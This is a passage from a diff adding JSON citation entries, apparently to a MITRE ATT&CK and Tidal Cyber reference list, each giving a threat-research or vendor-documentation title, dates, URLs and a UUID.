"2011-10-24T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN" + ], + "source": "MITRE", + "title": "Environment Property" + }, + "related": [], + "uuid": "64598969-864d-4bc7-805e-c289cccb7bc6", + "value": "Microsoft Environment Property" + }, + { + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, February). Equation Group: Questions and Answers. Retrieved December 21, 2015.", + "meta": { + "date_accessed": "2015-12-21T00:00:00Z", + "date_published": "2015-02-01T00:00:00Z", + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Equation Group: Questions and Answers" + }, + "related": [], + "uuid": "34674802-fbd9-4cdb-8611-c58665c430e5", + "value": "Kaspersky Equation QA" + }, + { + "description": "Cisco. (2022, August 16). erase - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.", + "meta": { + "date_accessed": "2022-07-13T00:00:00Z", + "date_published": "2022-08-16T00:00:00Z", + "refs": [ + "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/D_through_E.html#wp3557227463" + ], + "source": "MITRE", + "title": "erase - Cisco IOS Configuration Fundamentals Command Reference" + }, + "related": [], + "uuid": "4c90eba9-118e-5d50-ad58-27bcb0e1e228", + "value": "erase_cmd_cisco" + }, + { + "description": "0xn3va. (n.d.). Escaping. Retrieved May 27, 2022.", + "meta": { + "date_accessed": "2022-05-27T00:00:00Z", + "refs": [ + "https://0xn3va.gitbook.io/cheat-sheets/container/escaping" + ], + "source": "MITRE", + "title": "Escaping" + }, + "related": [], + "uuid": "8248917a-9afd-4ec6-a086-1a97a68deff1", + "value": "Container Escape" + }, + { + "description": "Microsoft. (2016, August 30). Esentutl. Retrieved September 3, 2019.", + "meta": { + "date_accessed": "2019-09-03T00:00:00Z", + "date_published": "2016-08-30T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh875546(v=ws.11)" + ], + "source": "MITRE", + "title": "Esentutl" + }, + "related": [], + "uuid": "08fb9e84-495f-4710-bd1e-417eb8191a10", + "value": "Microsoft Esentutl" + }, + { + "description": "LOLBAS. (n.d.). Esentutl.exe. Retrieved September 3, 2019.", + "meta": { + "date_accessed": "2019-09-03T00:00:00Z", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Esentutl/" + ], + "source": "MITRE", + "title": "Esentutl.exe" + }, + "related": [], + "uuid": "691b4907-3544-4ad0-989c-b5c845e0330f", + "value": "LOLBAS Esentutl" + }, + { + "description": "Cherepanov, Anton. (2019, November 10). ESETresearch discovered a trojanized IDA Pro installer. Retrieved March 2, 2022.", + "meta": { + "date_accessed": "2022-03-02T00:00:00Z", + "date_published": "2019-11-10T00:00:00Z", + "refs": [ + "https://twitter.com/ESETresearch/status/1458438155149922312" + ], + "source": "MITRE", + "title": "ESETresearch discovered a trojanized IDA Pro installer" + }, + "related": [], + "uuid": "6d079207-a7c0-4023-b504-1010dd538221", + "value": "ESET Twitter Ida Pro Nov 2021" + }, + { + "description": "ESET Research. (2020, October 1). ESET Research Tweet Linking Slothfulmedia and PowerPool. Retrieved November 17, 2020.", + "meta": { + "date_accessed": "2020-11-17T00:00:00Z", + "date_published": "2020-10-01T00:00:00Z", + "refs": [ + "https://twitter.com/ESETresearch/status/1311762215490461696" + ], + "source": "MITRE", + "title": "ESET Research Tweet Linking Slothfulmedia and PowerPool" + }, + "related": [], + "uuid": "d583b409-35bd-45ea-8f2a-c0d566a6865b", + "value": "ESET PowerPool Code October 2020" + }, + { + "description": "Kafka, F. (2018, January). ESET's Guide to Deobfuscating and Devirtualizing FinFisher. Retrieved August 12, 2019.", + "meta": { + "date_accessed": "2019-08-12T00:00:00Z", + "date_published": "2018-01-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf" + ], + "source": "MITRE", + "title": "ESET's Guide to Deobfuscating and Devirtualizing FinFisher" + }, + "related": [], + "uuid": "be169308-19e8-4ee9-8ff6-e08eb9291ef8", + "value": "ESET FinFisher Jan 2018" + }, + { + "description": "Boutin, J. (2020, October 12). ESET takes part in global operation to disrupt Trickbot. Retrieved March 15, 2021.", + "meta": { + "date_accessed": "2021-03-15T00:00:00Z", + "date_published": "2020-10-12T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/" + ], + "source": "MITRE", + "title": "ESET takes part in global operation to disrupt Trickbot" + }, + "related": [], + "uuid": "c3320c11-4631-4e02-8025-5c1e5b54e521", + "value": "ESET Trickbot Oct 2020" + }, + { + "description": "Jean-Ian Boutin, Tomáš Procházka. (2022, April 19). ESET takes part in global operation to disrupt Zloader botnets | WeLiveSecurity. Retrieved May 10, 2023.", + "meta": { + "date_accessed": "2023-05-10T00:00:00Z", + "date_published": "2022-04-19T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/" + ], + "source": "Tidal Cyber", + "title": "ESET takes part in global operation to disrupt Zloader botnets | WeLiveSecurity" + }, + "related": [], + "uuid": "f86845b9-03c4-446b-845f-b31b79b247ee", + "value": "WeLiveSecurity April 19 2022" + }, + { + "description": "Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018.", + "meta": { + "date_accessed": "2018-11-06T00:00:00Z", + "date_published": "2018-01-23T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20180124082756/https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/" + ], + "source": "MITRE", + "title": "Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors" + }, + "related": [], + "uuid": "a641a41c-dcd8-47e5-9b29-109dd2eb7f1e", + "value": "Riskiq Remcos Jan 2018" + }, + { + "description": "Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.", + "meta": { + "date_accessed": "2021-09-14T00:00:00Z", + "date_published": "2021-05-24T00:00:00Z", + "refs": [ + "https://www.coretechnologies.com/blog/windows-services/eventlog/" + ], + "source": "MITRE", + "title": "Essential Windows Services: EventLog / Windows Event Log" + }, + "related": [], + "uuid": "2a1f452f-57b6-4764-b474-befa7787642d", + "value": "EventLog_Core_Technologies" + }, + { + "description": "Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.", + "meta": { + "date_accessed": "2021-03-30T00:00:00Z", + "date_published": "2017-11-01T00:00:00Z", + "refs": [ + "https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes" + ], + "source": "MITRE", + "title": "Evasive Malware Tricks: How Malware Evades Detection by Sandboxes" + }, + "related": [], + "uuid": "a071bf02-066b-46e6-a554-f43d0c170807", + "value": "ISACA Malware Tricks" + }, + { + "description": "Shelmire, A.. (2015, July 6). Evasive Maneuvers. Retrieved January 22, 2016.", + "meta": { + "date_accessed": "2016-01-22T00:00:00Z", + "date_published": "2015-07-06T00:00:00Z", + "refs": [ + "https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop" + ], + "source": "MITRE", + "title": "Evasive Maneuvers" + }, + "related": [], + "uuid": "de6bc044-6275-4cab-80a1-feefebd3c1f0", + "value": "ThreatStream Evasion Analysis" + }, + { + "description": "Shelmire, A. (2015, July 06). Evasive Maneuvers by the Wekby group with custom ROP-packing and DNS covert channels. Retrieved November 15, 2018.", + "meta": { + "date_accessed": "2018-11-15T00:00:00Z", + "date_published": "2015-07-06T00:00:00Z", + "refs": [ + "https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop" + ], + "source": "MITRE", + "title": "Evasive Maneuvers by the Wekby group with custom ROP-packing and DNS covert channels" + }, + "related": [], + "uuid": "471ae30c-2753-468e-8e4d-6e7a3be599c9", + "value": "Anomali Evasive Maneuvers July 2015" + }, + { + "description": "Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.", + "meta": { + "date_accessed": "2023-02-06T00:00:00Z", + "date_published": "2016-05-01T00:00:00Z", + "refs": [ + "https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens" + ], + "source": "MITRE", + "title": "Evasive Serpens Unit 42 Playbook Viewer" + }, + "related": [], + "uuid": "e38902bb-9bab-5beb-817b-668a67a76541", + "value": "Unit42 OilRig Playbook 2023" + }, + { + "description": "Microsoft. (n.d.). EventLog.Clear Method (). Retrieved July 2, 2018.", + "meta": { + "date_accessed": "2018-07-02T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx" + ], + "source": "MITRE", + "title": "EventLog.Clear Method ()" + }, + "related": [], + "uuid": "b2711ad3-981c-4c77-bb64-643b547bfda6", + "value": "Microsoft EventLog.Clear" + }, + { + "description": "svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting the EventLog Service. Retrieved September 14, 2021.", + "meta": { + "date_accessed": "2021-09-14T00:00:00Z", + "date_published": "2020-09-30T00:00:00Z", + "refs": [ + "https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c" + ], + "source": "MITRE", + "title": "Event Log Tampering Part 1: Disrupting the EventLog Service" + }, + "related": [], + "uuid": "7757bbc6-8058-4584-a5aa-14b647d932a6", + "value": "evt_log_tampering" + }, + { + "description": "Microsoft. (2018, May 30). Event Tracing. Retrieved September 6, 2018.", + "meta": { + "date_accessed": "2018-09-06T00:00:00Z", + "date_published": "2018-05-30T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows/desktop/etw/event-tracing-portal" + ], + "source": "MITRE", + "title": "Event Tracing" + }, + "related": [], + "uuid": "876f8690-1874-41c0-bd38-d3bd41c96acc", + "value": "Microsoft ETW May 2018" + }, + { + "description": "LOLBAS. (2018, November 1). Eventvwr.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-11-01T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/" + ], + "source": "Tidal Cyber", + "title": "Eventvwr.exe" + }, + "related": [], + "uuid": "0c09812a-a936-4282-b574-35a00f631857", + "value": "Eventvwr.exe - LOLBAS Project" + }, + { + "description": "Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019.", + "meta": { + "date_accessed": "2019-02-07T00:00:00Z", + "date_published": "2018-04-11T00:00:00Z", + "refs": [ + "https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html" + ], + "source": "MITRE", + "title": "Ever Run a Relay? Why SMB Relays Should Be On Your Mind" + }, + "related": [], + "uuid": "ac4b2e91-f338-44c3-8950-435102136991", + "value": "Secure Ideas SMB Relay" + }, + { + "description": "Ishaq Mohammed . (2021, January 10). Everything about CSV Injection and CSV Excel Macro Injection. Retrieved February 7, 2022.", + "meta": { + "date_accessed": "2022-02-07T00:00:00Z", + "date_published": "2021-01-10T00:00:00Z", + "refs": [ + "https://blog.securelayer7.net/how-to-perform-csv-excel-macro-injection/" + ], + "source": "MITRE", + "title": "Everything about CSV Injection and CSV Excel Macro Injection" + }, + "related": [], + "uuid": "22c871ff-2701-4809-9f5b-fb29da7481e8", + "value": "CSV Excel Macro Injection" + }, + { + "description": "Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK PHISHING. Retrieved February 2, 2023.", + "meta": { + "date_accessed": "2023-02-02T00:00:00Z", + "refs": [ + "https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing" + ], + "source": "MITRE", + "title": "EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK PHISHING" + }, + "related": [], + "uuid": "abeb1146-e5e5-5ecc-9b70-b348fba097f6", + "value": "Avertium callback phishing" + }, + { + "description": "Rosenberg, J. (2017, September 20). Evidence Aurora Operation Still Active: Supply Chain Attack Through CCleaner. Retrieved February 13, 2018.", + "meta": { + "date_accessed": "2018-02-13T00:00:00Z", + "date_published": "2017-09-20T00:00:00Z", + "refs": [ + "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/" + ], + "source": "MITRE", + "title": "Evidence Aurora Operation Still Active: Supply Chain Attack Through CCleaner" + }, + "related": [], + "uuid": "b2999bd7-50d5-4d49-8893-8c0903d49104", + "value": "Intezer Aurora Sept 2017" + }, + { + "description": "Marschalek, M.. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019.", + "meta": { + "date_accessed": "2019-06-28T00:00:00Z", + "date_published": "2014-12-16T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/" + ], + "source": "MITRE", + "title": "EvilBunny: Malware Instrumented By Lua" + }, + "related": [], + "uuid": "a0218d0f-3378-4508-9d3c-a7cd3e00a156", + "value": "Cyphort EvilBunny Dec 2014" + }, + { + "description": "Hegt, S. (2019, May 5). Evil Clippy: MS Office maldoc assistant. Retrieved September 17, 2020.", + "meta": { + "date_accessed": "2020-09-17T00:00:00Z", + "date_published": "2019-05-05T00:00:00Z", + "refs": [ + "https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/" + ], + "source": "MITRE", + "title": "Evil Clippy: MS Office maldoc assistant" + }, + "related": [], + "uuid": "aafa27e8-5df7-4fc6-9fe5-9a438f2b507a", + "value": "Evil Clippy May 2019" + }, + { + "description": "Gretzky, K.. (2018, July 26). Evilginx 2 - Next Generation of Phishing 2FA Tokens. Retrieved October 14, 2019.", + "meta": { + "date_accessed": "2019-10-14T00:00:00Z", + "date_published": "2018-07-26T00:00:00Z", + "refs": [ + "https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/" + ], + "source": "MITRE", + "title": "Evilginx 2 - Next Generation of Phishing 2FA Tokens" + }, + "related": [], + "uuid": "9099b5aa-25eb-4cb7-9e3a-da4c3244f15a", + "value": "Evilginx 2 July 2018" + }, + { + "description": "Matthew Conway. (2023, December 14). Evilginx Phishing Proxy. Retrieved January 3, 2023.", + "meta": { + "date_accessed": "2023-01-03T00:00:00Z", + "date_published": "2023-12-14T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://sourcesmethods.com/evilginx-phishing-proxy/" + ], + "source": "Tidal Cyber", + "title": "Evilginx Phishing Proxy" + }, + "related": [], + "uuid": "13bdabb2-5956-492a-baf9-b0c3a0629806", + "value": "Evilginx Sources & Methods December 2023" + }, + { + "description": "Phil Stokes. (2020, July 8). “EvilQuest” Rolls Ransomware, Spyware & Data Theft Into One. Retrieved April 1, 2021.", + "meta": { + "date_accessed": "2021-04-01T00:00:00Z", + "date_published": "2020-07-08T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/" + ], + "source": "MITRE", + "title": "“EvilQuest” Rolls Ransomware, Spyware & Data Theft Into One" + }, + "related": [], + "uuid": "4dc26c77-d0ce-4836-a4cc-0490b6d7f115", + "value": "SentinelOne EvilQuest Ransomware Spyware 2020" + }, + { + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "date_published": "2015-10-08T00:00:00Z", + "refs": [ + "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices" + ], + "source": "MITRE", + "title": "Evolution of attacks on Cisco IOS devices" + }, + "related": [], + "uuid": "29301297-8343-4f75-8096-7fe229812f75", + "value": "Cisco Synful Knock Evolution" + }, + { + "description": "Fedor Sinitsyn. (2021, May 25). Evolution of JSWorm Ransomware. Retrieved August 18, 2021.", + "meta": { + "date_accessed": "2021-08-18T00:00:00Z", + "date_published": "2021-05-25T00:00:00Z", + "refs": [ + "https://securelist.com/evolution-of-jsworm-ransomware/102428/" + ], + "source": "MITRE", + "title": "Evolution of JSWorm Ransomware" + }, + "related": [], + "uuid": "c29ca9f2-1e48-4913-b10b-15e558868ed8", + "value": "Securelist JSWorm" + }, + { + "description": "Salinas, M., Holguin, J. (2017, June). Evolution of Trickbot. Retrieved July 31, 2018.", + "meta": { + "date_accessed": "2018-07-31T00:00:00Z", + "date_published": "2017-06-01T00:00:00Z", + "refs": [ + "https://www.securityartwork.es/wp-content/uploads/2017/07/Trickbot-report-S2-Grupo.pdf" + ], + "source": "MITRE", + "title": "Evolution of Trickbot" + }, + "related": [], + "uuid": "28faff77-3e68-4f5c-974d-dc7c9d06ce5e", + "value": "S2 Grupo TrickBot June 2017" + }, + { + "description": "Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020.", + "meta": { + "date_accessed": "2020-08-31T00:00:00Z", + "date_published": "2020-07-24T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/valak-evolution/" + ], + "source": "MITRE", + "title": "Evolution of Valak, from Its Beginnings to Mass Distribution" + }, + "related": [], + "uuid": "9a96da13-5795-49bc-ab82-dfd4f964d9d0", + "value": "Unit 42 Valak July 2020" + }, + { + "description": "Microsoft 365 Defender Threat Intelligence Team. (2022, January 26). Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA. Retrieved March 4, 2022.", + "meta": { + "date_accessed": "2022-03-04T00:00:00Z", + "date_published": "2022-01-26T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa" + ], + "source": "MITRE", + "title": "Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA" + }, + "related": [], + "uuid": "3f42fc18-2adc-46ef-ae0a-c2d530518435", + "value": "Microsoft - Device Registration" + }, + { + "description": "Amnesty International. (2019, August 16). Evolving Phishing Attacks Targeting Journalists and Human Rights Defenders from the Middle-East and North Africa. Retrieved October 8, 2019.", + "meta": { + "date_accessed": "2019-10-08T00:00:00Z", + "date_published": "2019-08-16T00:00:00Z", + "refs": [ + "https://www.amnesty.org/en/latest/research/2019/08/evolving-phishing-attacks-targeting-journalists-and-human-rights-defenders-from-the-middle-east-and-north-africa/" + ], + "source": "MITRE", + "title": "Evolving Phishing Attacks Targeting Journalists and Human Rights Defenders from the Middle-East and North Africa" + }, + "related": [], + "uuid": "0b0f9cf6-f0af-4f86-9699-a63ff36c49e2", + "value": "Amnesty OAuth Phishing Attacks, August 2019" + }, + { + "description": "Maccaglia, S. (2015, November 4). Evolving Threats: dissection of a CyberEspionage attack. Retrieved April 4, 2018.", + "meta": { + "date_accessed": "2018-04-04T00:00:00Z", + "date_published": "2015-11-04T00:00:00Z", + "refs": [ + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/2015.11.04_Evolving_Threats/cct-w08_evolving-threats-dissection-of-a-cyber-espionage-attack.pdf" + ], + "source": "MITRE", + "title": "Evolving Threats: dissection of a CyberEspionage attack" + }, + "related": [], + "uuid": "a6cb597e-e25b-4f49-bbb0-d270b1ac53f2", + "value": "RSAC 2015 Abu Dhabi Stefano Maccaglia" + }, + { + "description": "MSTIC. (2021, November 16). Evolving trends in Iranian threat actor activity – MSTIC presentation at CyberWarCon 2021. Retrieved January 12, 2023.", + "meta": { + "date_accessed": "2023-01-12T00:00:00Z", + "date_published": "2021-11-16T00:00:00Z", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021" + ], + "source": "MITRE", + "title": "Evolving trends in Iranian threat actor activity – MSTIC presentation at CyberWarCon 2021" + }, + "related": [], + "uuid": "78d39ee7-1cd5-5cb8-844a-1c3649e367a1", + "value": "Microsoft Iranian Threat Actor Trends November 2021" + }, + { + "description": "Vicky Ray and Rob Downs. (2014, October 29). Examining a VBA-Initiated Infostealer Campaign. Retrieved March 13, 2023.", + "meta": { + "date_accessed": "2023-03-13T00:00:00Z", + "date_published": "2014-10-29T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/" + ], + "source": "MITRE", + "title": "Examining a VBA-Initiated Infostealer Campaign" + }, + "related": [], + "uuid": "c3eccab6-b12b-513a-9a04-396f7b3dcf63", + "value": "Palo Alto Unit 42 VBA Infostealer 2014" + }, + { + "description": "Gonzalez, I., Chavez I., et al. (2022, May 9). Examining the Black Basta Ransomware’s Infection Routine. Retrieved March 7, 2023.", + "meta": { + "date_accessed": "2023-03-07T00:00:00Z", + "date_published": "2022-05-09T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html" + ], + "source": "MITRE", + "title": "Examining the Black Basta Ransomware’s Infection Routine" + }, + "related": [], + "uuid": "b0351b0a-112f-543f-8909-f4b4a9f23e2e", + "value": "Trend Micro Black Basta May 2022" + }, + { + "description": "Glyer, C. (2010). Examples of Recent APT Persistence Mechanism. Retrieved December 18, 2020.", + "meta": { + "date_accessed": "2020-12-18T00:00:00Z", + "date_published": "2010-01-01T00:00:00Z", + "refs": [ + "https://digital-forensics.sans.org/summit-archives/2010/35-glyer-apt-persistence-mechanisms.pdf" + ], + "source": "MITRE", + "title": "Examples of Recent APT Persistence Mechanism" + }, + "related": [], + "uuid": "bb336a6f-d76e-4535-ba81-0c7932ae91e3", + "value": "Mandiant Glyer APT 2010" + }, + { + "description": "LOLBAS. (2019, July 19). Excel.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2019-07-19T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/" + ], + "source": "Tidal Cyber", + "title": "Excel.exe" + }, + "related": [], + "uuid": "9a2458f7-63ca-4eca-8c61-b6098ec0798f", + "value": "Excel.exe - LOLBAS Project" + }, + { + "description": "McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding. Retrieved October 8, 2019.", + "meta": { + "date_accessed": "2019-10-08T00:00:00Z", + "date_published": "2015-06-08T00:00:00Z", + "refs": [ + "https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/" + ], + "source": "MITRE", + "title": "Exchange and Office 365 Mail Forwarding" + }, + "related": [], + "uuid": "b5bf8e12-0133-46ea-85e3-b48c9901b518", + "value": "Microsoft Tim McMichael Exchange Mail Forwarding 2" + }, + { + "description": "DFIR Report. (2021, November 15). Exchange Exploit Leads to Domain Wide Ransomware. Retrieved January 5, 2023.", + "meta": { + "date_accessed": "2023-01-05T00:00:00Z", + "date_published": "2021-11-15T00:00:00Z", + "refs": [ + "https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/" + ], + "source": "MITRE", + "title": "Exchange Exploit Leads to Domain Wide Ransomware" + }, + "related": [], + "uuid": "0156d408-a36d-5876-96fd-f0b0cf296ea2", + "value": "DFIR Phosphorus November 2021" + }, + { + "description": "Microsoft. (2017, September 25). ExchangePowerShell. Retrieved June 10, 2022.", + "meta": { + "date_accessed": "2022-06-10T00:00:00Z", + "date_published": "2017-09-25T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps#mailboxes" + ], + "source": "MITRE", + "title": "ExchangePowerShell" + }, + "related": [], + "uuid": "8af67c2a-15e2-48c9-9ec2-b62ffca0f677", + "value": "ExchangePowerShell Module" + }, + { + "description": "Faou, M., Tartare, M., Dupuy, T. (2021, March 10). Exchange servers under siege from at least 10 APT groups. Retrieved May 21, 2021.", + "meta": { + "date_accessed": "2021-05-21T00:00:00Z", + "date_published": "2021-03-10T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Exchange servers under siege from at least 10 APT groups" + }, + "related": [], + "uuid": "c83f1810-22bb-4def-ab2f-3f3d67703f47", + "value": "ESET Exchange Mar 2021" + }, + { + "description": "Stefan Kanthak. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation of privilege. Retrieved December 4, 2014.", + "meta": { + "date_accessed": "2014-12-04T00:00:00Z", + "date_published": "2015-12-08T00:00:00Z", + "refs": [ + "https://seclists.org/fulldisclosure/2015/Dec/34" + ], + "source": "MITRE", + "title": "Executable installers are vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation of privilege" + }, + "related": [], + "uuid": "5c2791d4-556d-426a-b305-44e23b50f013", + "value": "Executable Installers are Vulnerable" + }, + { + "description": "Kanthak, S. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe\tallows remote code execution with escalation of privilege. Retrieved March 10, 2017.", + "meta": { + "date_accessed": "2017-03-10T00:00:00Z", + "date_published": "2015-12-08T00:00:00Z", + "refs": [ + "http://seclists.org/fulldisclosure/2015/Dec/34" + ], + "source": "MITRE", + "title": "Executable installers are vulnerable^WEVIL (case 7): 7z*.exe\tallows remote code execution with escalation of privilege" + }, + "related": [], + "uuid": "f2ebfc35-1bd9-4bc5-8a54-e2dea4e1caf5", + "value": "Seclists Kanthak 7zip Installer" + }, + { + "description": "Hawkins, J. (2018, July 18). Executing Macros From a DOCX With Remote Template Injection. Retrieved October 12, 2018.", + "meta": { + "date_accessed": "2018-10-12T00:00:00Z", + "date_published": "2018-07-18T00:00:00Z", + "refs": [ + "http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html" + ], + "source": "MITRE", + "title": "Executing Macros From a DOCX With Remote Template Injection" + }, + "related": [], + "uuid": "bce1cd78-b55e-40cf-8a90-64240db867ac", + "value": "Redxorblue Remote Template Injection" + }, + { + "description": "Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019.", + "meta": { + "date_accessed": "2019-04-22T00:00:00Z", + "date_published": "2014-04-28T00:00:00Z", + "refs": [ + "https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/" + ], + "source": "MITRE", + "title": "Executing PowerShell scripts from C#" + }, + "related": [], + "uuid": "83e346d5-1894-4c46-98eb-88a61ce7f003", + "value": "Microsoft PSfromCsharp APR 2014" + }, + { + "description": "Fernández, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors & DNS requests. Retrieved June 26, 2020.", + "meta": { + "date_accessed": "2020-06-26T00:00:00Z", + "date_published": "2018-06-27T00:00:00Z", + "refs": [ + "https://x-c3ll.github.io/posts/PAM-backdoor-DNS/" + ], + "source": "MITRE", + "title": "Exfiltrating credentials via PAM backdoors & DNS requests" + }, + "related": [], + "uuid": "aa9d5bdd-2102-4322-8736-56db8e083fc0", + "value": "PAM Creds" + }, + { + "description": "Microsoft. (2017, October 15). Expand. Retrieved February 19, 2019.", + "meta": { + "date_accessed": "2019-02-19T00:00:00Z", + "date_published": "2017-10-15T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/expand" + ], + "source": "MITRE", + "title": "Expand" + }, + "related": [], + "uuid": "bf73a375-87b7-4603-8734-9f3d8d11967e", + "value": "Microsoft Expand Utility" + }, + { + "description": "LOLBAS. (n.d.). Expand.exe. Retrieved February 19, 2019.", + "meta": { + "date_accessed": "2019-02-19T00:00:00Z", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Expand/" + ], + "source": "MITRE", + "title": "Expand.exe" + }, + "related": [], + "uuid": "689b058e-a4ec-45bf-b0f8-8885eb8d8b63", + "value": "LOLBAS Expand" + }, + { + "description": "James Nugent, Foti Castelan, Doug Bienstock, Justin Moore, Josh Murchie. (2023, July 21). Exploitation of Citrix Zero-Day by Possible Espionage Actors (CVE-2023-3519). Retrieved July 24, 2023.", + "meta": { + "date_accessed": "2023-07-24T00:00:00Z", + "date_published": "2023-07-21T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.mandiant.com/resources/blog/citrix-zero-day-espionage" + ], + "source": "Tidal Cyber", + "title": "Exploitation of Citrix Zero-Day by Possible Espionage Actors (CVE-2023-3519)" + }, + "related": [], + "uuid": "4404ed65-3020-453d-8c51-2885018ba03b", + "value": "Mandiant CVE-2023-3519 Exploitation" + }, + { + "description": "Offensive Security. (n.d.). Exploit Database. Retrieved October 15, 2020.", + "meta": { + "date_accessed": "2020-10-15T00:00:00Z", + "refs": [ + "https://www.exploit-db.com/" + ], + "source": "MITRE", + "title": "Exploit Database" + }, + "related": [], + "uuid": "38f7b3ea-9959-4dfb-8216-a745d071e7e2", + "value": "Exploit Database" + }, + { + "description": "Rhino Labs. (2019, August). Exploiting AWS ECR and ECS with the Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019.", + "meta": { + "date_accessed": "2019-09-12T00:00:00Z", + "date_published": "2019-08-01T00:00:00Z", + "refs": [ + "https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/" + ], + "source": "MITRE", + "title": "Exploiting AWS ECR and ECS with the Cloud Container Attack Tool (CCAT)" + }, + "related": [], + "uuid": "8fb46ed8-0c21-4b57-b2a6-89cb28f0abaf", + "value": "Rhino Labs Cloud Image Backdoor Technique Sept 2019" + }, + { + "description": "Dr. 